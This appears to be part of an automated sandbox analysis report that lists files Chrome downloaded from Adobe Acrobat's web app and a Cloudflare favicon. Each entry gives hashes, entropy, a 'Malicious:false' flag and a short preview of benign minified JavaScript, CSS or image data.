                                                      Preview:K..2..&...;un......&|..}..?D}.-~.b...&..b.$.....)4<...}..Z..;.&L..-l|UAy..&....l.s*..-......84.>a... ...&..g.......}...{...-...)...}..k..fx...).J.)~..in..<...&.......<...+i..&....... ...w-6....ba.j...d3..+~..i..{...W....&...|J..}3....#@dj.@d..b~.~~..:..t....b..`e...`......}..uC..@k...}..>a........... ...}}..*......j.....r.....-...}..Vpb........}..X...'[....h..&...}...zW.Y....{......}....M......&....+..{...&...............|...&A.m~....4....#.&8.{.p.;...eb:..&...z.......i................j.]....|...?...........z-..3a..O.N........../......g!..C...!\.{..l..Rk/..<.@.....z...........z..J.z.{....?....4.>a...j....Q..........iT../u../..g...he.b.H...-..............Fmh.{....n......{....J..|N....`F....ip.6.7..-.yFmg$.i>.@k%.W}L..i5..*..Fm..b........J{...{.f.|...8.0...a......S.3..^...........{\MFm...}...c..@k...{n..c.......z...z...?......F...d...........Fm...{1(j...c...Y..c...i...-......:|..p..../...c..p....bp.....{?9!.bf.Rk..Cvl..c}.....~~y.b...c.[.bJ.>a......c...',..+....
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):595689
                                                      Entropy (8bit):5.747401132201536
                                                      Encrypted:false
                                                      SSDEEP:12288:aE5okbNaWLttOVL6jCAHW1zBahteVbTa2UWaXzt:aE5okbNaWLttOVL6jCAHW1zBXvUPXzt
                                                      MD5:23969F0BC1B2A1793DCFEF6A224A4C45
                                                      SHA1:80A9F6017E1FAA9EE218FDF448ED71CC41039E5C
                                                      SHA-256:2C90C23B2DDBCC7C4F1FCE715AC0DBBA1D0FD4D2146B481E4CD237E2BF51634B
                                                      SHA-512:508E9548D416E0110ABB3F87840435B37597DAD1CB80709C371FC9F46645ABBB1869E7463FDF4F0CCF64A997D0950866890388E5DD51E28535C3D76F9A8BF339
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-viewer-dropin/3.62.0_1.1382.0/dc-view-sdk.js
                                                      Preview:(()=>{var e,t,n,o,r={"5NR0":(e,t,n)=>{"use strict";var o=n("YWiy");e.exports=o.createElement("svg",{viewBox:"0 0 36 36"},o.createElement("path",{d:"M22.175 4H34v28L22.175 4zm-8.336 0H2v28L13.839 4zm4.165 10.317l7.538 17.682h-4.939l-2.258-5.632h-5.517l5.176-12.05z"}))},ETG3:(e,t,n)=>{"use strict";var o=n("YWiy");e.exports=o.createElement("svg",{viewBox:"0 0 48 48"},o.createElement("path",{d:"M29.219 6H44v36L29.219 6zM18.798 6H4v36L18.798 6zm5.207 13.265l9.422 22.733h-6.173l-2.823-7.24h-6.896l6.47-15.493z"}))},XVDt:(e,t,n)=>{"use strict";var o=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)Object.prototype.hasOwnProperty.call(n,o)&&(e[o]=n[o])}return e},r=_interopRequireDefault(n("EtOT")),a=_interopRequireDefault(n("YWiy"));function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}var s=function WrappedIcon(e){return a.default.createElement(r.default,o({},e,{icon:{18:n("5NR0"),24:n("ETG3")}}))};s.displayName="AdobeLogo",t.A=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (1801)
                                                      Category:downloaded
                                                      Size (bytes):1851
                                                      Entropy (8bit):5.058191588607331
                                                      Encrypted:false
                                                      SSDEEP:24:kqlToqUo/I3d/Apgi2V87paog/UXQGoBe9FKI0KOpF6fdm1/:uqUo/I3d/IgiSaa3MX8Be9Fz0jv6U/
                                                      MD5:0418575A982585E495AFD42C1FEE1CE7
                                                      SHA1:3F532AF23E522F178AE5A5A109BB780A9070042A
                                                      SHA-256:C3244A472500F35840E35827EA56DCE4AB1CB17069AEA34602F3EEB9A424218D
                                                      SHA-512:70B6D3E5107C8D99FBE10EED0AD4CA9200CB069B9FF577F2172FC81929C1DD48F085B68E29D2EEF69755DECDCB9D3D668FD7DB96B49096E58321C70F2D19DC8B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-web-app-dropin/3.18.0_2.208.0/web-prefs-api.js
                                                      Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[333],{"2uJW":(e,r,t)=>{"use strict";t.r(r),t.d(r,{default:()=>a});var i,s,n=t("abd3"),c=t("plsW");function _applyDecoratedDescriptor(e,r,t,i,s){var n={};return Object.keys(i).forEach((function(e){n[e]=i[e]})),n.enumerable=!!n.enumerable,n.configurable=!!n.configurable,("value"in n||n.initializer)&&(n.writable=!0),n=t.slice().reverse().reduce((function(t,i){return i(e,r,t)||t}),n),s&&void 0!==n.initializer&&(n.value=n.initializer?n.initializer.call(s):void 0,n.initializer=void 0),void 0===n.initializer&&(Object.defineProperty(e,r,n),n=null),n}let a=(_applyDecoratedDescriptor((i=class DCWebPrefsAPI{constructor(){!function _initializerDefineProperty(e,r,t,i){t&&Object.defineProperty(e,r,{enumerable:t.enumerable,configurable:t.configurable,writable:t.writable,value:t.initializer?t.initializer.call(i):void 0})}(this,"prefs",s,this),this.setPref=(e,r,t)=>this.user.getPreferences("dcweb").then((i=>{const s=i;s[e]||(s[e]={}
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (16355)
                                                      Category:downloaded
                                                      Size (bytes):16411
                                                      Entropy (8bit):4.317100105755358
                                                      Encrypted:false
                                                      SSDEEP:192:M1/AaFtXWN7gijqS8C8UiYaf0cy5QUIpi8IUIPc5QpaY6e+MuPWRBn27qV:qAabXOjqS8r6r5QU6ItU5/n+X27qV
                                                      MD5:DFF189E880C4E2F5325CA196BF36798C
                                                      SHA1:BA4B45A0C38A691D2C3CA42AE9F69464B77F0E66
                                                      SHA-256:8D00C332E0EB5700C72C8847AAB09EBA2C0C85860049DCF044BA5D6840EAF7FA
                                                      SHA-512:D6B58E506A1BCD2F94BB0CDAF9FB7AEEBFE0D9AA35B577690E0341312DAF6F6DDAF6DEC357756A8140BD1F7E9A185D5E132DC48AC7054EB368C8CC59ED9A3C07
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1239.0/context-board-icons.js
                                                      Preview:(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[9487],{dXsL:(e,C,a)=>{var l=a("YWiy");function SCompresspdfColor18(e){return l.createElement("svg",e,l.createElement("g",{fill:"none",fillRule:"evenodd"},[l.createElement("path",{fill:"#1B959A",fillRule:"nonzero",d:"M14 11.5328421L14 14.600006C14 14.800006 13.8 15.000006 13.6 15.000006L4.4 15.000006C4.2 15.000006 4 14.800006 4 14.600006L4 11.3144983 3 12.3657769 3 14.600006C3 15.400006 3.6 16.000006 4.4 16.000006L13.6 16.000006C14.4 16.000006 15 15.400006 15 14.600006L15 12.5006082 14 11.5328421zM4 6.21490073L4 2.4C4 2.2 4.2 2 4.4 2 9.2 2 11.6 2 11.6 2L14 4.4C14 4.4 14 4.84349053 14 5.73047158L15 4.65558511 15 4.3C15 4.1 14.8811646 3.9 14.7 3.7L12.3 1.3C12.1 1.1 11.8 1 11.5 1L4.4 1C3.6 1 3 1.6 3 2.4L3 5.02660135 4 6.21490073z",key:0}),l.createElement("path",{fill:"#1B959A",fillRule:"nonzero",d:"M12.4635909,9.95878011 C12.455406,10.0024023 12.4358821,10.0455898 12.4039411,10.0853397 C12.375833,10.1246944 12
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):111622
                                                      Entropy (8bit):5.663528837234454
                                                      Encrypted:false
                                                      SSDEEP:1536:476eU/9XKllU6TMZP9gFC8MPLKQ+wtkFpFXJjhJwsIS+QN6N5MmQfbN+e1s:r/96liGMZP9gFePtERISvN6N5MfbN+e+
                                                      MD5:954330226D8FA9A51BBA2326C94A004F
                                                      SHA1:93EA5726FFC0C4CC6AEDA6E85374CE597CCEE7AA
                                                      SHA-256:5D3F6B45D286270BB1696170A0CF637B1EF73A16125839F14B5D07A6625143F5
                                                      SHA-512:A24B5A1F05A45D8EB72002B9F7074D8D64C92FCCC1ACEC0D3A596C6DA4FCDA9A18106CA297587EB2A5E678BBC4E062B13953D192A86312D9264F2B050F6D6A35
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/wasm_acrobat_we.06a6e3dda872b4c83bd1de13616f0fd4.js
                                                      Preview:var Module=void 0!==Module?Module:{};Error.stackTraceLimit=200,self.prejs_time=performance.now(),Error.prepareStackTrace=function(p,g){const f=`${p.name?p.name:""}, ${p.message?p.message:""}`;let A=g.map((function(p){return` at ${p.toString()}`})).join("\n");return A=A.replace(/(data:application\/javascript[^:\n\r]+)/g,"inlined_wasm.js"),`${f}\n${A}`};var moduleOverrides=Object.assign({},Module),arguments_=[],thisProgram="./this.program",quit_=(p,g)=>{throw g},ENVIRONMENT_IS_WEB="object"==typeof window,ENVIRONMENT_IS_WORKER="function"==typeof importScripts,ENVIRONMENT_IS_NODE="object"==typeof process&&"object"==typeof process.versions&&"string"==typeof process.versions.node,scriptDirectory="",read_,readAsync,readBinary;function locateFile(p){return Module.locateFile?Module.locateFile(p,scriptDirectory):scriptDirectory+p}if(ENVIRONMENT_IS_NODE){var fs=require("fs"),nodePath=require("path");scriptDirectory=ENVIRONMENT_IS_WORKER?nodePath.dirname(scriptDirectory)+"/":__dirname+"/",read_
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Unicode text, UTF-8 text, with very long lines (65533), with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):174378
                                                      Entropy (8bit):5.578148265360498
                                                      Encrypted:false
                                                      SSDEEP:3072:ReZzPCd1tjMe+1sRu2NYmcVWtfKReMLtbl+PsWuSsixj:ReZzPCd1tjMe+1sRu2hcVWtfctbuNuSp
                                                      MD5:3A2F7823CE30FB5FCF551CCE1A251FE3
                                                      SHA1:59BD2DC0171DCD827A29F83ED8282691BFCCC2F5
                                                      SHA-256:DDC8789E905A18383B85B0C69BCA40303F348EAECA7F80FD8F189C96144B68E6
                                                      SHA-512:31C77BCA060E77CF9752538B7F73D66FC62EFBDD0058B86EB85E04FC89FBCA46D8ECACB3460C6CF4032BA597E90FBADDAFA746F52B422D5AFCE0BED5A990E3E0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-files2-dropin/3.58.0_2.717.0/bootstrap.js
                                                      Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="1fbb1850-e235-4a6e-9f15-8a24a8112ae8",e._sentryDebugIdIdentifier="sentry-dbid-1fbb1850-e235-4a6e-9f15-8a24a8112ae8")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"b2aaa94a66520d673e9e90091d77d97c59bf9850"},(()=>{var e,t,r,n,o={rGn5:(e,t,r)=>{"use strict";t.J=function A4uRemoveCircle(e){var t=_extends({},e);return n.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),n.default.createElement("path",{fillRule:"evenodd",d:"M18,2A16,16,0,1,0,34,18,16,16,0,0,0,18,2ZM28,19a1,1,0,0,1-1,1H9a1,1,0,0,1-1-1V17a1,1,0,0,1,1-1H27a1,1,0,0,1,1,1Z"}))};var n=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("YWiy"));function _extends(){return _extends=O
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (65442)
                                                      Category:downloaded
                                                      Size (bytes):185550
                                                      Entropy (8bit):5.633585570490466
                                                      Encrypted:false
                                                      SSDEEP:3072:ARJTAfjjxYnGS0fc6nAZ6srcfEeo6gkh9gekkb9NF:ARJcLjmNrcfnz9r
                                                      MD5:2446E93B8E888E4BEBE5C13191117340
                                                      SHA1:8544DC0FF20721E2E6A0B86D02CEED25E59C51B8
                                                      SHA-256:43568B75ACC474025D1C68F6FFD29DC9C197587EA078D61E9A13B2DAD528A57B
                                                      SHA-512:43D772B9037EFD9BA94FF0A9F405FDBCF44C8C9FAFE7F2315BB2F64F10F61761391C044F96539DC5F49AAC3AD884090D7F6FE04DB7D027921D6A359A78B03786
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-rendition-provider/AJS/build/acrobatProxy_we.60db765eaf19dc146b68.js
                                                      Preview:/*! For license information please see acrobatProxy_we.60db765eaf19dc146b68.js.LICENSE.txt */.var AcrobatJS;(()=>{var F={8127:(F,x,D)=>{var M={"./digsig.wasm":7588,"./digsig.wasm.symbols":1205,"./digsig2.wasm":5158,"./digsig2.wasm.symbols":3275,"./digsig_we.wasm":8449,"./digsig_we.wasm.symbols":1076,"./dummy_split.wasm.symbols":1597,"./libcld.wasm":833,"./libcld.wasm.symbols":3572,"./libcld2.wasm":8793,"./libcld2.wasm.symbols":1836,"./libcld_we.wasm":2038,"./libcld_we.wasm.symbols":5531,"./libjp2k.wasm":1493,"./libjp2k.wasm.symbols":4600,"./libjp2k2.wasm":4757,"./libjp2k2.wasm.symbols":7672,"./libjp2k_we.wasm":26,"./libjp2k_we.wasm.symbols":2767,"./libxml.wasm":1965,"./libxml.wasm.symbols":2016,"./libxml2.wasm":3501,"./libxml2.wasm.symbols":4944,"./libxml_we.wasm":898,"./libxml_we.wasm.symbols":2519,"./licensing.wasm":3183,"./licensing.wasm.symbols":8166,"./licensing2.wasm":695,"./licensing2.wasm.symbols":7086,"./licensing_we.wasm":1208,"./licensing_we.wasm.symbols":5017,"./wasm_acroba
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):937
                                                      Entropy (8bit):7.737931820487441
                                                      Encrypted:false
                                                      SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                                      MD5:FC3B7BBE7970F47579127561139060E2
                                                      SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                      SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                      SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://developers.cloudflare.com/favicon.png
                                                      Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (6632)
                                                      Category:downloaded
                                                      Size (bytes):6725
                                                      Entropy (8bit):4.815386393157721
                                                      Encrypted:false
                                                      SSDEEP:48:54OqN17mkJ6947LvBdlCfilT86iQG9HpERu9XAqpIme2KO+I1V+5YwKJqOW2frZl:54FrHJEC9Kb5gOA6J1wu42gJJCC6
                                                      MD5:93B9ACE62366EE2621BD63F5937E93E5
                                                      SHA1:52BA0FFF722949C4B3B978D7976BE4814C11D5A0
                                                      SHA-256:09274898CBBE69883AA09F5D7C8E9D906ECB8645BB64FAC38545B46F372B65A8
                                                      SHA-512:222E289E9701CFF95A067F7187F1BDD396E86B5304A836AC46D9A1A8554C03F9C0DB5528C916121EBB91EF2B95E69271F0C85859F528BACE8CDC0BB6296F39FB
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://prod.adobeccstatic.com/unav/1.4/layout.bundle.css
                                                      Preview:/* For license information please see https://prod.adobeccstatic.com/License/LICENSE.txt */...universal-nav-container .unav-comp-error{display:flex;padding:1rem 0;gap:.5rem;flex-direction:column;justify-content:center;align-items:center;flex:1 0 0;align-self:center}.universal-nav-container .unav-comp-error .error-msg{color:#505050;text-align:center;font-size:.875rem;font-style:normal;font-weight:400;line-height:150%}.universal-nav-container .unav-comp-error .error-cta{color:#0265dc;font-size:.875rem;font-family:inherit;font-weight:400;word-wrap:break-word}.universal-nav-container .unav-comp-help-popover .unav-comp-error{width:15rem;height:9rem}.universal-nav-container .unav-comp-app-switcher-popover .unav-comp-error{width:21rem;height:34rem}.universal-nav-container .app-switcher-skeleton-header{display:flex;padding:0 .5rem 1rem .5rem;align-items:center;gap:1rem;align-self:stretch;width:100%}.universal-nav-container .app-switcher-skeleton-header .app-switcher-skeleton-header-label-wrapp
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (3290)
                                                      Category:downloaded
                                                      Size (bytes):3338
                                                      Entropy (8bit):5.124717548047286
                                                      Encrypted:false
                                                      SSDEEP:48:p9w4XAXennCP2UaxRlBntfgmYyV9TbBKF5lZsEiOUjjKPT0K9jNn9GKWK:E4QpORxRlBnBo4u5vsNOpZd/Gm
                                                      MD5:AFBECDDFAA7F93F4D9A8F4DC21C9ACB6
                                                      SHA1:110F0290A61D09CC3F5B3171AE4CB716404C0EFC
                                                      SHA-256:66D1068845E1DA3F2EAD24C1C531E0D169A09BB8BBB1603A1FCC62AA56AB1FB0
                                                      SHA-512:C60E01B233637C2DC8FBED9612C0063D81FAFC21CDD5B81BD94607A0627BDFBCEA5C956A927D19409F59DAC64B55684E8938A0A54D4124D31AB63B445CDDC91C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.682.0/18-18-icons.js
                                                      Preview:(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[7070],{JKe3:(e,a,t)=>{var l=t("YWiy");function SRotatePages24N(e){return l.createElement("svg",e,[l.createElement("polygon",{points:"14.58932 8.032 11.99332 8.032 11.99332 5.392 14.58932 8.032",fill:"var(--iconChartreuse, #87b103)",fillRule:"evenodd",isolation:"isolate",opacity:".1",key:0}),l.createElement("path",{d:"M1.99332,5H9.99332v3c0,1.1,.9,2,2,2h3v12H1.99332V5Z",fill:"var(--iconChartreuse, #87b103)",fillRule:"evenodd",isolation:"isolate",opacity:".1",key:1}),l.createElement("path",{d:"M15.57996,6.23999l-2.59216-2.37415c-.77002-.78003-.88782-.86584-1.98779-.86584H2C.89996,3,0,3.89996,0,5V22c0,1.09998,.89996,2,2,2H15c1.09998,0,2-.90002,2-2V8.64996c-.01001-1.09998-.64001-1.63-1.42004-2.40997Zm-3.57996-.82001l2.57996,2.58002h-2.57996v-2.58002Zm3,16.58002H2V5H10v3c0,1.09998,.89996,2,2,2h3v12Z",fill:"var(--iconChartreuse, #87b103)",key:2}),l.createElement("path",{d:"M23.9093,8.13037c-.05969-.06329-.14
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (4579)
                                                      Category:downloaded
                                                      Size (bytes):4646
                                                      Entropy (8bit):5.141919226365306
                                                      Encrypted:false
                                                      SSDEEP:96:AWfi2sNtZYxLp+2sBubyIQarlo+tZltZYazJO3xdzvkXEyPtZnz8qhx/5y8KHw6B:AWfi2sbZYy2g5arloOZDZYugxh2EyFZO
                                                      MD5:491BF990A181A06203C9B65DF764817D
                                                      SHA1:8A3176DFC1C2904F1C77F91C7D7AB1006FC1324C
                                                      SHA-256:B1CA101DE4ECCEEA3229D11DF0B0E34C47E36B5BAC95661F3910AF4507D1F83E
                                                      SHA-512:36D78380B0F8EDF6599E713F4BD82F4B2FFC96AF98F9C66624A7ADA96FC1F78A1B31F42C1EC700EB3C6058934A39202114F33B88F706DB2192A3374CDFE501A0
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1133.0/keyboardshortcutprovider-chunk.js
                                                      Preview:"use strict";(self["webpackJsonp-preview"]=self["webpackJsonp-preview"]||[]).push([[1634],{HMU2:(t,r,s)=>{s.r(r),s.d(r,{default:()=>KeyboardShortcutsProvider});class KeyboardShortcut{constructor(t,r,s){this.id=void 0,this.shortcutExprs=void 0,this.handler=void 0,this.id=t,this.shortcutExprs=r,this.handler=s}}var e=s("plsW"),o=s("WLLa"),h=s("vPEr");const getFormattedShortcutExpr=t=>{let r="";return t.altKey&&(r+="alt_"),t.ctrlKey&&(r+="ctrl_"),t.metaKey&&(r+="meta_"),t.shiftKey&&(r+="shift_"),`${r}${sanitiseEventCode(t.code.toLowerCase())}`},formatShortcutExpr=t=>{const r=t.toLowerCase().split("+").map(sanitiseModifierKeys).sort(),s=r.filter(isModifier).join("_"),e=r.filter((t=>!isModifier(t))).pop();return s?e?`${s}_${e}`:null:e},getDisplayLabel=t=>{const r=sanitiseModifierKeys(t.toLowerCase());return o.jx[r]?o.jx[r]:t},sanitiseEventCode=t=>{let r=t;for(const t of o.PA)r=r.replace(t,"");return r},sanitiseModifierKeys=t=>"command"===t||"cmd"===t?"meta":"control"===t?"ctrl":t,isModifier=
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (41079)
                                                      Category:downloaded
                                                      Size (bytes):41132
                                                      Entropy (8bit):5.754766564770083
                                                      Encrypted:false
                                                      SSDEEP:768:jbvk4HraVVmnPa55b/sgXaJR7eIzURuSmmjxz+XXt1aLykWvxUecqQ4KcVs4hEWZ:PcVmnPa55sZJIIzUceKnSyLxURqzGaGy
                                                      MD5:00EB125581927D59D6FAAE8A17F2917E
                                                      SHA1:47DB1E346432807120CF2A83C1BCEAD98732CAC7
                                                      SHA-256:D0B26E6042C3840A311E81CC91DDD11ABDC1E806A0CA6F5CFA50998C6662EB05
                                                      SHA-512:8B0E33BF43558B7F3AD938AEB1AB78DE37BF8BC144F658396BFC40E56DBC1809BEDB34BB13DAB2AFF8BD739DDE0C35DF0E8AA8883B832C76FA19792762DB74FE
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-genai-dropin/3.65.0_1.1117.0/verb-qanda-chunk.js
                                                      Preview:(self["webpackJsonp-genai"]=self["webpackJsonp-genai"]||[]).push([[930,1399],{qCTy:(e,t,n)=>{"use strict";n.d(t,{w:()=>unsubscribeFromSelectors,x:()=>subscribeToSelector});var o=n("abd3");let a=[];const unsubscribeFromSelectors=()=>{a.forEach((e=>{e&&"function"==typeof e&&e()})),a=[]},subscribeToSelector=function(e,t,n){let i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:(e,t)=>e!==t;for(var r=arguments.length,s=new Array(r>4?r-4:0),l=4;l<r;l++)s[l-4]=arguments[l];const c=(0,o.computed)((()=>t(e,...s)));let d=c.get(),u=!0;const p=(0,o.autorun)((e=>{const t=c.get();(i(d,t)||u)&&(u=!1,d=t,n(t,e))}));return a.push(p),p}},Dtsy:(e,t,n)=>{"use strict";n.r(t),n.d(t,{default:()=>G});var o=n("YWiy"),a=n("plsW"),i=n("RUbQ"),r=n.n(i),s=n("oDTv"),l=n.n(s),c=n("6RXP"),d=n.n(c),u=n("itEc"),p=n("qCTy"),g=n("1zr1"),h=n("4llJ"),A=n("PGMW"),m=n("zjjr"),C=n("3aG4"),E=n("/y6s"),f=n("wQpj"),_=n("WsOM"),v=n("1eas"),y=n("VjBA"),I=n("6Eex"),b=n("iwBX"),w=n.n(b),x=n("PZ3W"),T=n.n(x);const O=(0,I.x2)((
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (12231)
                                                      Category:downloaded
                                                      Size (bytes):12271
                                                      Entropy (8bit):5.420731278627347
                                                      Encrypted:false
                                                      SSDEEP:192:1+oFfQh7GmkhQzwtC9CQ1/A9xFjG1uFplP1JjBOr2udGbpmjmvYcbAf:17Ff7hQuQ1ohKAlHBOr2udGbpmjmJbS
                                                      MD5:7799CF67CFD2292EE014D7B1E29533FE
                                                      SHA1:801EA7A2D903B05CA3D782FC9BC62B5E8A7BB0BB
                                                      SHA-256:72A3255860FAC13836EFA42355CD40AFCDD05D28E5103E7B776F02A09B0DDF0E
                                                      SHA-512:9320F3F6A5D56C5CCDBFD7B0233F5D1120A9D672CABC00A327D74A063706A003AEAA00F5F0A78871F4E9649BB594E24AFCAF35B5DD377EC3F4184E7BD5F6812D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-web-app-dropin/3.18.0_2.208.0/732.js
                                                      Preview:(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[732,619],{d1dY:(t,e,i)=>{"use strict";i.r(e),i.d(e,{KNOWN_STATUS:()=>o,default:()=>n});var s=i("plsW");const o={LOCK_SCHEDULED:"LOCK_SCHEDULED",LOCKED:"LOCKED",DEFERRED:"DEFERRED",ABORTED:"ABORTED",COMPLETED:"COMPLETED"},r=s.logging.getLogger("AcpMigrationApi");class AcpMigrationApi{constructor(){var t=this;this.dcApiListener=function(e,i){let s=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};const{headers:o={}}=s;if(o["x-acp-migration-info"]){const e=o["x-acp-migration-info"],i=t.parseMigrationHeader(e);t.currentMigrationInfo=i,t.notifyListeners(i)}},this.dcApiErrorListener=(t,e,i)=>{if(423===i.code||403===i.code){var s,o;const t=null===(s=i.details)||void 0===s||null===(o=s.headers)||void 0===o?void 0:o["x-acp-migration-info"];if(t){const e=this.parseMigrationHeader(t);this.currentMigrationInfo=e,this.notifyListeners(e)}}},this.notificationListener=()=>{s.providers["get-unc-obj"]().then((t=>{t.RegisterOb
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (12488)
                                                      Category:downloaded
                                                      Size (bytes):12535
                                                      Entropy (8bit):4.911176421713736
                                                      Encrypted:false
                                                      SSDEEP:192:p7Pe3hMFnURWhMFnffCafu4jkkYlTXQhVQWRsMDVtV+:p7JBUpBfh5jkkgUhCW7DR+
                                                      MD5:BEAB5225A8663804A13E85F063BF69C2
                                                      SHA1:9587F9F1D78665C9BF2CA0B61903199FD73D889D
                                                      SHA-256:2A04C8E6D27FA6FEF61D44551BE3CB90E64C3ADC0613F9E40AB4650AC326A6D0
                                                      SHA-512:6A13B7C07769A03AEB0A46D9BE474C5A2AC280681DC49C16B04DE7A8CBD2147A13B06C04590EE7C7C2B69D28FC8D1B518C7BEFB0E748B1C2EC3D0448B26DA12C
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://acrobat.adobe.com/dc-pdfverbs-web/3.60.0_4.1239.0/tile-icons.js
                                                      Preview:(self["webpackJsonp-pdfverbs-web"]=self["webpackJsonp-pdfverbs-web"]||[]).push([[7979],{EVr9:(e,a,t)=>{var l=t("YWiy");function SCompresspdf36(e){return l.createElement("svg",e,[l.createElement("path",{d:"M6,22.318V31a2,2,0,0,0,2,2H28a2,2,0,0,0,2-2h0V22.321l1,.994V31a3.00015,3.00015,0,0,1-2.82373,2.99491L28,34H8a3,3,0,0,1-3-3H5V23.312ZM23.38,2a2.47,2.47,0,0,1,1.76.73h0l5.12,5.1A2.52,2.52,0,0,1,31,9.6h0v2.485l-1,.994V9.6a1.50008,1.50008,0,0,0-.34032-.95008L29.56,8.54l-5.12-5.1A1.5,1.5,0,0,0,23.38,3H8A2,2,0,0,0,6,5H6v8.08l-1-.994V5A3.00016,3.00016,0,0,1,7.82373,2.0051L8,2Z",fill:"var(--iconAcrobatScan, #19b3b8)",key:0}),l.createElement("path",{d:"M23.38,3a1.5,1.5,0,0,1,1.06.44l5.12,5.1A1.5,1.5,0,0,1,30,9.6v3.479l-2.94045,2.92326a2.38577,2.38577,0,0,0,.00934,3.40457L30,22.321V31a2,2,0,0,1-2,2H8a2,2,0,0,1-2-2V22.318l2.93752-2.92038.14112-.154.0649-.07773A2.38551,2.38551,0,0,0,8.93065,15.994L6,13.08V5A2,2,0,0,1,8,3Z",fill:"var(--iconAcrobatScan, #19b3b8)",opacity:"0.1",style:{isolation:"iso
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:downloaded
                                                      Size (bytes):16
                                                      Entropy (8bit):3.75
                                                      Encrypted:false
                                                      SSDEEP:3:HUT2gYn:q2d
                                                      MD5:D4AD1856E0411BA43FBE6445E2A697D0
